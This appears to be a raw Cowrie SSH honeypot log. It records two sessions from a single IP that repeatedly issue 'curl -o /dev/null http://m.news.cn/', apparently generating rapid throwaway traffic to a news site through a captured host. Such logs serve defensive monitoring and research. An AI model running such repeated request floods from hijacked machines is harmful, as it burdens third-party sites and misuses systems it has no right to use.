{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.989064Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.013136Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.014058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.018310Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.027002Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.028190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.053454Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.054426Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.062414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.063182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.082260Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.093466Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.095869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.096938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.101089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.101863Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.133791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.134623Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.138072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.139020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.162006Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.176472Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.178176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.179263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.181922Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.182733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.186355Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.189145Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.198344Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.212967Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.219427Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.220245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.223673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.224492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.254490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.259534Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.260409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.277945Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.279264Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.284537Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.289076Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.295177Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.301746Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.312611Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.313356Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.332378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.333622Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.336589Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.342144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.346246Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.355026Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.358174Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.362279Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.364292Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.372718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.373523Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.376019Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.378246Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.379221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.384198Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.386277Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.389648Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.408066Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.412067Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.412843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.417285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.417992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.422009Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.427419Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.431632Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.451050Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.451955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.455236Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.455885Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.470172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.471704Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.488118Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
